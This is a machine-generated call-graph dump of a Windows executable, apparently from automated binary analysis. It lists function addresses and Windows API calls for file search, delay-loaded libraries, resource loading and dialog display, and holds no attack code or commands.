24052->24046 24054 f0828e __EH_prolog 24053->24054 24082 f013dc 24054->24082 24056 f082aa 24057 f082bb 24056->24057 24225 f09f42 24056->24225 24060 f082f2 24057->24060 24090 f01a04 24057->24090 24221 f01692 24060->24221 24065 f083e8 24117 f01f6d 24065->24117 24067 f082ee 24067->24060 24071 f0a56d 7 API calls 24067->24071 24073 f08389 24067->24073 24229 f0c0c5 CompareStringW _wcslen 24067->24229 24071->24067 24109 f08430 24073->24109 24074 f083f3 24074->24060 24121 f03b2d 24074->24121 24133 f0848e 24074->24133 24076 f0a582 24075->24076 24077 f0a5b0 24076->24077 24487 f0a69b 24076->24487 24077->24000 24079 f0a592 24079->24077 24080 f0a597 FindClose 24079->24080 24080->24077 24081->24006 24083 f013e1 __EH_prolog 24082->24083 24084 f0ce40 8 API calls 24083->24084 24085 f01419 24084->24085 24086 f1eb38 8 API calls 24085->24086 24089 f01474 _abort 24085->24089 24087 f01461 24086->24087 24087->24089 24230 f0b505 24087->24230 24089->24056 24091 f01a0e __EH_prolog 24090->24091 24103 f01a61 24091->24103 24106 f01b9b 24091->24106 24246 f013ba 24091->24246 24094 f01bc7 24249 f0138b 74 API calls 24094->24249 24096 f03b2d 101 API calls 24100 f01c12 24096->24100 24097 f01bd4 24097->24096 24097->24106 24098 f01c5a 24102 f01c8d 24098->24102 24098->24106 24250 f0138b 74 API calls 24098->24250 24100->24098 24101 f03b2d 101 API calls 24100->24101 24101->24100 24102->24106 24107 f09e80 79 API calls 24102->24107 24103->24094 24103->24097 24103->24106 24104 f03b2d 101 API calls 24105 f01cde 24104->24105 24105->24104 24105->24106 24106->24067 24107->24105 24108 f09e80 79 API calls 24108->24103 24268 f0cf3d 24109->24268 24111 f08440 24272 f113d2 GetSystemTime SystemTimeToFileTime 24111->24272 24113 f083a3 24113->24065 24114 f11b66 24113->24114 24273 f1de6b 24114->24273 24118 f01f72 __EH_prolog 24117->24118 24120 f01fa6 24118->24120 24281 f019af 24118->24281 24120->24074 24122 f03b39 24121->24122 24123 f03b3d 24121->24123 24122->24074 24132 f09e80 79 API calls 24123->24132 24124 f03b4f 24125 f03b78 24124->24125 24126 f03b6a 24124->24126 24414 f0286b 101 API calls 3 library calls 24125->24414 24128 f03baa 24126->24128 24413 f032f7 89 API calls 2 library calls 24126->24413 24128->24074 24130 f03b76 24130->24128 24415 f020d7 74 API calls 24130->24415 24132->24124 24134 f08498 __EH_prolog 24133->24134 24135 f084d5 24134->24135 24148 f08513 24134->24148 24440 f18c8d 103 API calls 24134->24440 24137 f084f5 24135->24137 24142 f0857a 24135->24142 24135->24148 24138 f084fa 24137->24138 24139 f0851c 24137->24139 24138->24148 24441 f07a0d 152 API calls 24138->24441 24139->24148 24442 f18c8d 103 API calls 24139->24442 24142->24148 24416 f05d1a 24142->24416 24144 f08605 24144->24148 24422 f08167 24144->24422 24147 f08797 24149 f0a56d 7 API calls 24147->24149 24150 f08802 24147->24150 24148->24074 24149->24150 24428 f07c0d 24150->24428 24152 f0d051 82 API calls 24158 f0885d 24152->24158 24153 f08992 24154 f08a5f 24153->24154 24161 f089e1 24153->24161 24159 f08ab6 24154->24159 24172 f08a6a 24154->24172 24155 f0898b 24445 f02021 74 API calls 24155->24445 24158->24148 24158->24152 24158->24153 24158->24155 24443 f08117 84 API calls 24158->24443 24444 f02021 74 API calls 24158->24444 24165 f08a4c 24159->24165 24448 f07fc0 97 API calls 24159->24448 24160 f08ab4 24166 f0959a 80 API calls 24160->24166 24163 f08b14 24161->24163 24161->24165 24167 f0a231 3 API calls 24161->24167 24162 f09105 24164 f0959a 80 API calls 24162->24164 24163->24162 24181 f08b82 24163->24181 24449 f098bc 24163->24449 24164->24148 24165->24160 24165->24163 24166->24148 24169 f08a19 24167->24169 24169->24165 24446 f092a3 97 API calls 24169->24446 24170 f0ab1a 8 API calls 24173 f08bd1 24170->24173 24172->24160 24447 f07db2 101 API calls 24172->24447 24176 f0ab1a 8 API calls 24173->24176 24193 f08be7 24176->24193 24179 f08b70 24453 f06e98 77 API calls 24179->24453 24181->24170 24182 f08cbc 24183 f08e40 24182->24183 24184 f08d18 24182->24184 24186 f08e52 24183->24186 24187 f08e66 24183->24187 24207 f08d49 24183->24207 24185 f08d8a 24184->24185 24188 f08d28 24184->24188 24195 f08167 19 API calls 24185->24195 24189 f09215 123 API calls 24186->24189 24190 f13377 75 API calls 24187->24190 24191 f08d6e 24188->24191 24199 f08d37 24188->24199 24189->24207 24192 f08e7f 24190->24192 24191->24207 24456 f077b8 111 API calls 24191->24456 24459 f13020 123 API calls 24192->24459 24193->24182 24194 f08c93 24193->24194 24202 f0981a 79 API calls 24193->24202 24194->24182 24454 f09a3c 82 API calls 24194->24454 24200 f08dbd 24195->24200 24455 f02021 74 API calls 24199->24455 24203 f08df5 24200->24203 24204 f08de6 24200->24204 24200->24207 24202->24194 24458 f09155 93 API calls __EH_prolog 24203->24458 24457 f07542 85 API calls 24204->24457 24210 f08f85 24207->24210 24460 f02021 74 API calls 24207->24460 24209 f09090 24209->24162 24211 f0a4ed 3 API calls 24209->24211 24210->24162 24210->24209 24212 f0903e 24210->24212 24434 f09f09 SetEndOfFile 24210->24434 24213 f090eb 24211->24213 24435 f09da2 24212->24435 24213->24162 24461 f02021 74 API calls 24213->24461 24216 f09085 24217 f09620 77 API calls 24216->24217 24217->24209 24219 f090fb 24462 f06dcb 76 API calls 24219->24462 24222 f016a4 24221->24222 24478 f0cee1 24222->24478 24226 f09f59 24225->24226 24227 f09f63 24226->24227 24486 f06d0c 78 API calls 24226->24486 24227->24057 24229->24067 24231 f0b50f __EH_prolog 24230->24231 24236 f0f1d0 82 API calls 24231->24236 24233 f0b521 24237 f0b61e 24233->24237 24236->24233 24238 f0b630 _abort 24237->24238 24241 f110dc 24238->24241 24244 f1109e GetCurrentProcess GetProcessAffinityMask 24241->24244 24245 f0b597 24244->24245 24245->24089 24251 f01732 24246->24251 24248 f013d6 24248->24108 24249->24106 24250->24102 24252 f017a0 __InternalCxxFrameHandler 24251->24252 24253 f01748 24251->24253 24252->24248 24254 f01771 24253->24254 24264 f06c36 76 API calls __vswprintf_c_l 24253->24264 24255 f017c7 24254->24255 24261 f0178d ___std_exception_copy 24254->24261 24258 f23e3e 22 API calls 24255->24258 24257 f01767 24265 f06ca7 75 API calls 24257->24265 24260 f017ce 24258->24260 24260->24252 24267 f06ca7 75 API calls 24260->24267 24261->24252 24266 f06ca7 75 API calls 24261->24266 24264->24257 24265->24254 24266->24252 24267->24252 24269 f0cf4d 24268->24269 24271 f0cf54 24268->24271 24270 f0981a 79 API calls 24269->24270 24270->24271 24271->24111 24272->24113 24274 f1de78 24273->24274 24275 f0e617 53 API calls 24274->24275 24276 f1de9b 24275->24276 24277 f04092 _swprintf 51 API calls 24276->24277 24278 f1dead 24277->24278 24279 f1d4d4 16 API calls 24278->24279 24280 f11b7c 24279->24280 24280->24065 24282 f019bf 24281->24282 24285 f019bb 24281->24285 24286 f09e80 79 API calls 24282->24286 24283 f019d4 24287 f018f6 24283->24287 24285->24120 24286->24283 24288 f01945 24287->24288 24289 f01908 24287->24289 24295 f03fa3 24288->24295 24290 f03b2d 101 API calls 24289->24290 24293 f01928 24290->24293 24293->24285 24299 f03fac 24295->24299 24296 f03b2d 101 API calls 24296->24299 24297 f01966 24297->24293 24300 f01e50 24297->24300 24299->24296 24299->24297 24312 f10e08 24299->24312 24301 f01e5a __EH_prolog 24300->24301 24320 f03bba 24301->24320 24303 f01e84 24304 f01732 78 API calls 24303->24304 24306 f01f0b 24303->24306 24305 f01e9b 24304->24305 24348 f018a9 78 API calls 24305->24348 24306->24293 24308 f01eb3 24310 f01ebf _wcslen 24308->24310 24349 f11b84 MultiByteToWideChar 24308->24349 24350 f018a9 78 API calls 24310->24350 24313 f10e0f 24312->24313 24314 f10e2a 24313->24314 24318 f06c31 RaiseException _com_raise_error 24313->24318 24316 f10e3b SetThreadExecutionState 24314->24316 24319 f06c31 RaiseException _com_raise_error 24314->24319 24316->24299 24318->24314 24319->24316 24321 f03bc4 __EH_prolog 24320->24321 24322 f03bf6 24321->24322 24323 f03bda 24321->24323 24325 f03e51 24322->24325 24328 f03c22 24322->24328 24376 f0138b 74 API calls 24323->24376 24393 f0138b 74 API calls 24325->24393 24327 f03be5 24327->24303 24328->24327 24351 f13377 24328->24351 24330 f03ca3 24332 f03d2e 24330->24332 24347 f03c9a 24330->24347 24379 f0d051 24330->24379 24331 f03c9f 24331->24330 24378 f020bd 78 API calls 24331->24378 24361 f0ab1a 24332->24361 24334 f03c71 24334->24330 24334->24331 24335 f03c8f 24334->24335 24377 f0138b 74 API calls 24335->24377 24337 f03d41 24341 f03dd7 24337->24341 24342 f03dc7 24337->24342 24385 f13020 123 API calls 24341->24385 24365 f09215 24342->24365 24345 f03dd5 24345->24347 24386 f02021 74 API calls 24345->24386 24387 f12297 24347->24387 24348->24308 24349->24310 24350->24306 24352 f1338c 24351->24352 24354 f13396 ___std_exception_copy 24351->24354 24394 f06ca7 75 API calls 24352->24394 24355 f1341c 24354->24355 24356 f134c6 24354->24356 24360 f13440 _abort 24354->24360 24395 f132aa 75 API calls 3 library calls 24355->24395 24396 f2238d RaiseException 24356->24396 24359 f134f2 24360->24334 24362 f0ab28 24361->24362 24364 f0ab32 24361->24364 24363 f1eb38 8 API calls 24362->24363 24363->24364 24364->24337 24366 f0921f __EH_prolog 24365->24366 24397 f07c64 24366->24397 24369 f013ba 78 API calls 24370 f09231 24369->24370 24400 f0d114 24370->24400 24373 f0d114 118 API calls 24374 f09243 24373->24374 24374->24373 24375 f0928a 24374->24375 24409 f0d300 97 API calls __InternalCxxFrameHandler 24374->24409 24375->24345 24376->24327 24377->24347 24378->24330 24380 f0d072 24379->24380 24381 f0d084 24379->24381 24410 f0603a 82 API calls 24380->24410 24411 f0603a 82 API calls 24381->24411 24384 f0d07c 24384->24332 24385->24345 24386->24347 24388 f122a1 24387->24388 24389 f122ba 24388->24389 24392 f122ce 24388->24392 24412 f10eed 86 API calls 24389->24412 24391 f122c1 24391->24392 24393->24327 24394->24354 24395->24360 24396->24359 24398 f0b146 GetVersionExW 24397->24398 24399 f07c69 24398->24399 24399->24369 24407 f0d12a __InternalCxxFrameHandler 24400->24407 24401 f0d29a 24402 f0d2ce 24401->24402 24403 f0d0cb 6 API calls 24401->24403 24404 f10e08 SetThreadExecutionState RaiseException 24402->24404 24403->24402 24406 f0d291 24404->24406 24405 f18c8d 103 API calls 24405->24407 24406->24374 24407->24401 24407->24405 24407->24406 24408 f0ac05 91 API calls 24407->24408 24408->24407 24409->24374 24410->24384 24411->24384 24412->24391 24413->24130 24414->24130 24415->24128 24417 f05d2a 24416->24417 24463 f05c4b 24417->24463 24420 f05d5d 24421 f05d95 24420->24421 24468 f0b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24420->24468 24421->24144 24423 f08186 24422->24423 24424 f08232 24423->24424 24475 f0be5e 19 API calls __InternalCxxFrameHandler 24423->24475 24474 f11fac CharUpperW 24424->24474 24427 f0823b 24427->24147 24429 f07c22 24428->24429 24430 f07c5a 24429->24430 24476 f06e7a 74 API calls 24429->24476 24430->24158 24432 f07c52 24477 f0138b 74 API calls 24432->24477 24434->24212 24436 f09db3 24435->24436 24438 f09dc2 24435->24438 24437 f09db9 FlushFileBuffers 24436->24437 24436->24438 24437->24438 24439 f09e3f SetFileTime 24438->24439 24439->24216 24440->24135 24441->24148 24442->24148 24443->24158 24444->24158 24445->24153 24446->24165 24447->24160 24448->24165 24450 f08b5a 24449->24450 24451 f098c5 GetFileType 24449->24451 24450->24181 24452 f02021 74 API calls 24450->24452 24451->24450 24452->24179 24453->24181 24454->24182 24455->24207 24456->24207 24457->24207 24458->24207 24459->24207 24460->24210 24461->24219 24462->24162 24469 f05b48 24463->24469 24466 f05c6c 24466->24420 24467 f05b48 2 API calls 24467->24466 24468->24420 24472 f05b52 24469->24472 24470 f05c3a 24470->24466 24470->24467 24472->24470 24473 f0b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24472->24473 24473->24472 24474->24427 24475->24424 24476->24432 24477->24430 24479 f0cef2 24478->24479 24484 f0a99e 86 API calls 24479->24484 24481 f0cf24 24485 f0a99e 86 API calls 24481->24485 24483 f0cf2f 24484->24481 24485->24483 24486->24227 24488 f0a6a8 24487->24488 24489 f0a6c1 FindFirstFileW 24488->24489 24490 f0a727 FindNextFileW 24488->24490 24492 f0a6d0 24489->24492 24497 f0a709 24489->24497 24491 f0a732 GetLastError 24490->24491 24490->24497 24491->24497 24493 f0bb03 GetCurrentDirectoryW 24492->24493 24494 f0a6e0 24493->24494 24495 f0a6e4 FindFirstFileW 24494->24495 24496 f0a6fe GetLastError 24494->24496 24495->24496 24495->24497 24496->24497 24497->24079 24507 f1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24498->24507 24500 f1a5cd 24501 f1a5d9 24500->24501 24508 f1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24500->24508 24501->23730 24501->23731 24503->23734 24504->23740 24505->23740 24506->23743 24507->24500 24508->24501 24509->23751 24511 f09f42 78 API calls 24510->24511 24512 f01fe8 24511->24512 24513 f01a04 101 API calls 24512->24513 24516 f02005 24512->24516 24514 f01ff5 24513->24514 24514->24516 24517 f0138b 74 API calls 24514->24517 24516->23759 24516->23760 24517->24516 24519 f1b583 GetMessageW 24518->24519 24520 f1b5bc GetDlgItem 24518->24520 24521 f1b599 IsDialogMessageW 24519->24521 24522 f1b5a8 TranslateMessage DispatchMessageW 24519->24522 24520->23770 24520->23773 24521->24520 24521->24522 24522->24520 24523 f013e1 84 API calls 2 library calls 25327 f194e0 GetClientRect 25363 f121e0 26 API calls std::bad_exception::bad_exception 25387 f1f2e0 46 API calls __RTC_Initialize 25388 f2bee0 GetCommandLineA GetCommandLineW 24525 f1eae7 24526 f1eaf1 24525->24526 24529 f1e85d 24526->24529 24555 f1e5bb 24529->24555 24531 f1e86d 24532 f1e8ca 24531->24532 24543 f1e8ee 24531->24543 24533 f1e7fb DloadReleaseSectionWriteAccess 6 API calls 24532->24533 24534 f1e8d5 RaiseException 24533->24534 24535 f1eac3 24534->24535 24536 f1e966 LoadLibraryExA 24537 f1e9c7 24536->24537 24538 f1e979 GetLastError 24536->24538 24542 f1e9d9 24537->24542 24544 f1e9d2 FreeLibrary 24537->24544 24539 f1e9a2 24538->24539 24540 f1e98c 24538->24540 24545 f1e7fb DloadReleaseSectionWriteAccess 6 API calls 24539->24545 24540->24537 24540->24539 24541 f1ea37 GetProcAddress 24546 f1ea47 GetLastError 24541->24546 24551 f1ea95 24541->24551 24542->24541 24542->24551 24543->24536 24543->24537 24543->24542 24543->24551 24544->24542 24547 f1e9ad RaiseException 24545->24547 24548 f1ea5a 24546->24548 24547->24535 24550 f1e7fb DloadReleaseSectionWriteAccess 6 API calls 24548->24550 24548->24551 24552 f1ea7b RaiseException 24550->24552 24564 f1e7fb 24551->24564 24553 f1e5bb ___delayLoadHelper2@8 6 API calls 24552->24553 24554 f1ea92 24553->24554 24554->24551 24556 f1e5c7 24555->24556 24557 f1e5ed 24555->24557 24572 f1e664 24556->24572 24557->24531 24559 f1e5cc 24560 f1e5e8 24559->24560 24575 f1e78d 24559->24575 24580 f1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24560->24580 24563 f1e836 24563->24531 24565 f1e80d 24564->24565 24566 f1e82f 24564->24566 24567 f1e664 DloadReleaseSectionWriteAccess 3 API calls 24565->24567 24566->24535 24568 f1e812 24567->24568 24569 f1e82a 24568->24569 24570 f1e78d DloadProtectSection 3 API calls 24568->24570 24583 f1e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24569->24583 24570->24569 24581 f1e5ee GetModuleHandleW GetProcAddress GetProcAddress 24572->24581 24574 f1e669 24574->24559 24576 f1e7a2 DloadProtectSection 24575->24576 24577 f1e7a8 24576->24577 24578 f1e7dd VirtualProtect 24576->24578 24582 f1e6a3 VirtualQuery GetSystemInfo 24576->24582 24577->24560 24578->24577 24580->24563 24581->24574 24582->24578 24583->24566 25328 f1f4e7 29 API calls _abort 25364 f0f1e8 FreeLibrary 24590 f1e1d1 14 API calls ___delayLoadHelper2@8 25329 f1f4d3 20 API calls 25403 f2a3d0 21 API calls _free 25404 f32bd0 VariantClear 24594 f010d5 24599 f05abd 24594->24599 24600 f05ac7 __EH_prolog 24599->24600 24601 f0b505 84 API calls 24600->24601 24602 f05ad3 24601->24602 24606 f05cac GetCurrentProcess GetProcessAffinityMask 24602->24606 24607 f1e2d7 24609 f1e1db 24607->24609 24608 f1e85d ___delayLoadHelper2@8 14 API calls 24608->24609 24609->24608 25390 f20ada 51 API calls 2 library calls 25366 f1b5c0 100 API calls 25405 f177c0 118 API calls 25406 f1ffc0 RaiseException _com_raise_error _com_error::_com_error 24675 f1dec2 24676 f1decf 24675->24676 24677 f0e617 53 API calls 24676->24677 24678 f1dedc 24677->24678 24679 f04092 _swprintf 51 API calls 24678->24679 24680 f1def1 SetDlgItemTextW 24679->24680 24681 f1b568 5 API calls 24680->24681 24682 f1df0e 24681->24682 25391 f162ca 123 API calls __InternalCxxFrameHandler 25367 f1b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24820 f1f3b2 24821 f1f3be ___scrt_is_nonwritable_in_current_image 24820->24821 24852 f1eed7 24821->24852 24823 f1f518 24925 f1f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24823->24925 24824 f1f3c5 24824->24823 24827 f1f3ef 24824->24827 24826 f1f51f 24918 f27f58 24826->24918 24839 f1f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24827->24839 24863 f28aed 24827->24863 24834 f1f40e 24836 f1f48f 24871 f1f953 GetStartupInfoW _abort 24836->24871 24838 f1f495 24872 f28a3e 51 API calls 24838->24872 24839->24836 24921 f27af4 38 API calls 2 library calls 24839->24921 24842 f1f49d 24873 f1df1e 24842->24873 24846 f1f4b1 24846->24826 24847 f1f4b5 24846->24847 24848 f1f4be 24847->24848 24923 f27efb 28 API calls _abort 24847->24923 24924 f1f048 12 API calls ___scrt_uninitialize_crt 24848->24924 24851 f1f4c6 24851->24834 24853 f1eee0 24852->24853 24927 f1f654 IsProcessorFeaturePresent 24853->24927 24855 f1eeec 24928 f22a5e 24855->24928 24857 f1eef5 24857->24824 24858 f1eef1 24858->24857 24936 f28977 24858->24936 24861 f1ef0c 24861->24824 24866 f28b04 24863->24866 24864 f1fbbc _ValidateLocalCookies 5 API calls 24865 f1f408 24864->24865 24865->24834 24867 f28a91 24865->24867 24866->24864 24868 f28ac0 24867->24868 24869 f1fbbc _ValidateLocalCookies 5 API calls 24868->24869 24870 f28ae9 24869->24870 24870->24839 24871->24838 24872->24842 25029 f10863 24873->25029 24877 f1df3d 25078 f1ac16 24877->25078 24879 f1df46 _abort 24880 f1df59 GetCommandLineW 24879->24880 24881 f1dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24880->24881 24882 f1df68 24880->24882 24883 f04092 _swprintf 51 API calls 24881->24883 25112 f1c5c4 83 API calls 24882->25112 24885 f1e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24883->24885 25082 f1b6dd LoadBitmapW 24885->25082 24886 f1df6e 24888 f1dfe0 24886->24888 24889 f1df76 OpenFileMappingW 24886->24889 25114 f1dbde SetEnvironmentVariableW SetEnvironmentVariableW 24888->25114 24892 f1dfd6 CloseHandle 24889->24892 24893 f1df8f MapViewOfFile 24889->24893 24892->24881 24895 f1dfa0 __InternalCxxFrameHandler 24893->24895 24896 f1dfcd UnmapViewOfFile 24893->24896 25113 f1dbde SetEnvironmentVariableW SetEnvironmentVariableW 24895->25113 24896->24892 24901 f1dfbc 24901->24896 24902 f190b7 8 API calls 24903 f1e0aa DialogBoxParamW 24902->24903 24904 f1e0e4 24903->24904 24905 f1e0f6 Sleep 24904->24905 24906 f1e0fd 24904->24906 24905->24906 24909 f1e10b 24906->24909 25115 f1ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24906->25115 24908 f1e12a DeleteObject 24910 f1e146 24908->24910 24911 f1e13f DeleteObject 24908->24911 24909->24908 24912 f1e177 24910->24912 24913 f1e189 24910->24913 24911->24910 25116 f1dc3b 6 API calls 24912->25116 25109 f1ac7c 24913->25109 24916 f1e17d CloseHandle 24916->24913 24917 f1e1c3 24922 f1f993 GetModuleHandleW 24917->24922 25247 f27cd5 24918->25247 24921->24836 24922->24846 24923->24848 24924->24851 24925->24826 24927->24855 24940 f23b07 24928->24940 24931 f22a67 24931->24858 24933 f22a6f 24934 f22a7a 24933->24934 24954 f23b43 DeleteCriticalSection 24933->24954 24934->24858 24983 f2c05a 24936->24983 24939 f22a7d 7 API calls 2 library calls 24939->24857 24942 f23b10 24940->24942 24943 f23b39 24942->24943 24944 f22a63 24942->24944 24955 f23d46 24942->24955 24960 f23b43 DeleteCriticalSection 24943->24960 24944->24931 24946 f22b8c 24944->24946 24976 f23c57 24946->24976 24949 f22ba1 24949->24933 24951 f22baf 24952 f22bbc 24951->24952 24982 f22bbf 6 API calls ___vcrt_FlsFree 24951->24982 24952->24933 24954->24931 24961 f23c0d 24955->24961 24958 f23d7e InitializeCriticalSectionAndSpinCount 24959 f23d69 24958->24959 24959->24942 24960->24944 24962 f23c26 24961->24962 24966 f23c4f 24961->24966 24962->24966 24968 f23b72 24962->24968 24965 f23c3b GetProcAddress 24965->24966 24967 f23c49 24965->24967 24966->24958 24966->24959 24967->24966 24974 f23b7e ___vcrt_FlsFree 24968->24974 24969 f23bf3 24969->24965 24969->24966 24970 f23b95 LoadLibraryExW 24971 f23bb3 GetLastError 24970->24971 24972 f23bfa 24970->24972 24971->24974 24972->24969 24973 f23c02 FreeLibrary 24972->24973 24973->24969 24974->24969 24974->24970 24975 f23bd5 LoadLibraryExW 24974->24975 24975->24972 24975->24974 24977 f23c0d ___vcrt_FlsFree 5 API calls 24976->24977 24978 f23c71 24977->24978 24979 f23c8a TlsAlloc 24978->24979 24980 f22b96 24978->24980 24980->24949 24981 f23d08 6 API calls ___vcrt_FlsFree 24980->24981 24981->24951 24982->24949 24986 f2c073 24983->24986 24987 f2c077 24983->24987 24984 f1fbbc _ValidateLocalCookies 5 API calls 24985 f1eefe 24984->24985 24985->24861 24985->24939 24986->24984 24987->24986 24989 f2a6a0 24987->24989 24990 f2a6ac ___scrt_is_nonwritable_in_current_image 24989->24990 25001 f2ac31 EnterCriticalSection 24990->25001 24992 f2a6b3 25002 f2c528 24992->25002 24994 f2a6c2 24995 f2a6d1 24994->24995 25015 f2a529 29 API calls 24994->25015 25017 f2a6ed LeaveCriticalSection _abort 24995->25017 24998 f2a6cc 25016 f2a5df GetStdHandle GetFileType 24998->25016 24999 f2a6e2 _abort 24999->24987 25001->24992 25003 f2c534 ___scrt_is_nonwritable_in_current_image 25002->25003 25004 f2c541 25003->25004 25005 f2c558 25003->25005 25026 f291a8 20 API calls _free 25004->25026 25018 f2ac31 EnterCriticalSection 25005->25018 25008 f2c546 25027 f29087 26 API calls ___std_exception_copy 25008->25027 25010 f2c550 _abort 25010->24994 25013 f2c590 25028 f2c5b7 LeaveCriticalSection _abort 25013->25028 25014 f2c564 25014->25013 25019 f2c479 25014->25019 25015->24998 25016->24995 25017->24999 25018->25014 25020 f2b136 _free 20 API calls 25019->25020 25021 f2c48b 25020->25021 25024 f2af0a 11 API calls 25021->25024 25025 f2c498 25021->25025 25022 f28dcc _free 20 API calls 25023 f2c4ea 25022->25023 25023->25014 25024->25021 25025->25022 25026->25008 25027->25010 25028->25010 25030 f1ec50 25029->25030 25031 f1086d GetModuleHandleW 25030->25031 25032 f108e7 25031->25032 25033 f10888 GetProcAddress 25031->25033 25036 f10c14 GetModuleFileNameW 25032->25036 25126 f275fb 42 API calls __vsnwprintf_l 25032->25126 25034 f108a1 25033->25034 25035 f108b9 GetProcAddress 25033->25035 25034->25035 25037 f108cb 25035->25037 25045 f10c32 25036->25045 25037->25032 25039 f10b54 25039->25036 25040 f10b5f GetModuleFileNameW CreateFileW 25039->25040 25041 f10c08 CloseHandle 25040->25041 25042 f10b8f SetFilePointer 25040->25042 25041->25036 25042->25041 25043 f10b9d ReadFile 25042->25043 25043->25041 25047 f10bbb 25043->25047 25048 f10c94 GetFileAttributesW 25045->25048 25050 f10c5d CompareStringW 25045->25050 25051 f10cac 25045->25051 25117 f0b146 25045->25117 25120 f1081b 25045->25120 25047->25041 25049 f1081b 2 API calls 25047->25049 25048->25045 25048->25051 25049->25047 25050->25045 25052 f10cb7 25051->25052 25055 f10cec 25051->25055 25054 f10cd0 GetFileAttributesW 25052->25054 25056 f10ce8 25052->25056 25053 f10dfb 25077 f1a64d GetCurrentDirectoryW 25053->25077 25054->25052 25054->25056 25055->25053 25057 f0b146 GetVersionExW 25055->25057 25056->25055 25058 f10d06 25057->25058 25059 f10d73 25058->25059 25060 f10d0d 25058->25060 25061 f04092 _swprintf 51 API calls 25059->25061 25062 f1081b 2 API calls 25060->25062 25063 f10d9b AllocConsole 25061->25063 25064 f10d17 25062->25064 25065 f10df3 ExitProcess 25063->25065 25066 f10da8 GetCurrentProcessId AttachConsole 25063->25066 25067 f1081b 2 API calls 25064->25067 25127 f23e13 25066->25127 25069 f10d21 25067->25069 25071 f0e617 53 API calls 25069->25071 25070 f10dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25070->25065 25072 f10d3c 25071->25072 25073 f04092 _swprintf 51 API calls 25072->25073 25074 f10d4f 25073->25074 25075 f0e617 53 API calls 25074->25075 25076 f10d5e 25075->25076 25076->25065 25077->24877 25079 f1081b 2 API calls 25078->25079 25080 f1ac2a OleInitialize 25079->25080 25081 f1ac4d GdiplusStartup SHGetMalloc 25080->25081 25081->24879 25083 f1b70b GetObjectW 25082->25083 25084 f1b6fe 25082->25084 25088 f1b71a 25083->25088 25129 f1a6c2 FindResourceW 25084->25129 25087 f1a5c6 4 API calls 25089 f1b72d 25087->25089 25088->25087 25090 f1b770 25089->25090 25091 f1b74c 25089->25091 25093 f1a6c2 13 API calls 25089->25093 25101 f0da42 25090->25101 25145 f1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25091->25145 25095 f1b73d 25093->25095 25094 f1b754 25146 f1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25094->25146 25095->25091 25097 f1b743 DeleteObject 25095->25097 25097->25091 25098 f1b75d 25147 f1a80c 8 API calls 25098->25147 25100 f1b764 DeleteObject 25100->25090 25156 f0da67 25101->25156 25106 f190b7 25107 f1eb38 8 API calls 25106->25107 25108 f190d6 25107->25108 25108->24902 25110 f1acab GdiplusShutdown CoUninitialize 25109->25110 25110->24917 25112->24886 25113->24901 25114->24881 25115->24909 25116->24916 25118 f0b196 25117->25118 25119 f0b15a GetVersionExW 25117->25119 25118->25045 25119->25118 25121 f1ec50 25120->25121 25122 f10828 GetSystemDirectoryW 25121->25122 25123 f10840 25122->25123 25124 f1085e 25122->25124 25125 f10851 LoadLibraryW 25123->25125 25124->25045 25125->25124 25126->25039 25128 f23e1b 25127->25128 25128->25070 25128->25128 25130 f1a6e5 SizeofResource 25129->25130 25131 f1a7d3 25129->25131 25130->25131 25132 f1a6fc LoadResource 25130->25132 25131->25083 25131->25088 25132->25131 25133 f1a711 LockResource 25132->25133 25133->25131 25134 f1a722 GlobalAlloc 25133->25134 25134->25131 25135 f1a73d GlobalLock 25134->25135 25136 f1a7cc GlobalFree 25135->25136 25137 f1a74c __InternalCxxFrameHandler 25135->25137 25136->25131 25138 f1a754 CreateStreamOnHGlobal 25137->25138 25139 f1a7c5 GlobalUnlock 25138->25139 25140 f1a76c 25138->25140 25139->25136 25148 f1a626 GdipAlloc 25140->25148 25143 f1a7b0 25143->25139 25144 f1a79a GdipCreateHBITMAPFromBitmap 25144->25143 25145->25094 25146->25098 25147->25100 25149 f1a645 25148->25149 25150 f1a638 25148->25150 25149->25139 25149->25143 25149->25144 25152 f1a3b9 25150->25152 25153 f1a3e1 GdipCreateBitmapFromStream 25152->25153 25154 f1a3da GdipCreateBitmapFromStreamICM 25152->25154 25155 f1a3e6 25153->25155 25154->25155 25155->25149 25157 f0da75 __EH_prolog 25156->25157 25158 f0daa4 GetModuleFileNameW 25157->25158 25159 f0dad5 25157->25159 25160 f0dabe 25158->25160 25202 f098e0 25159->25202 25160->25159 25162 f0959a 80 API calls 25164 f0da4e 25162->25164 25163 f0db31 25213 f26310 25163->25213 25200 f0e29e GetModuleHandleW FindResourceW 25164->25200 25166 f0e261 78 API calls 25167 f0db05 25166->25167 25167->25163 25167->25166 25194 f0dd4a 25167->25194 25168 f0db44 25169 f26310 26 API calls 25168->25169 25177 f0db56 ___vcrt_FlsFree 25169->25177 25170 f0dc85 25170->25194 25233 f09d70 81 API calls 25170->25233 25172 f09e80 79 API calls 25172->25177 25174 f0dc9f ___std_exception_copy 25175 f09bd0 82 API calls 25174->25175 25174->25194 25176 f0dcc8 ___std_exception_copy 25175->25176 25176->25194 25197 f0dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25176->25197 25234 f11b84 MultiByteToWideChar 25176->25234 25177->25170 25177->25172 25177->25194 25227 f09bd0 25177->25227 25232 f09d70 81 API calls 25177->25232 25180 f0e159 25185 f0e1de 25180->25185 25240 f28cce 26 API calls ___std_exception_copy 25180->25240 25182 f0e16e 25241 f27625 26 API calls ___std_exception_copy 25182->25241 25184 f0e214 25190 f26310 26 API calls 25184->25190 25185->25184 25189 f0e261 78 API calls 25185->25189 25187 f0e1c6 25242 f0e27c 78 API calls 25187->25242 25189->25185 25191 f0e22d 25190->25191 25192 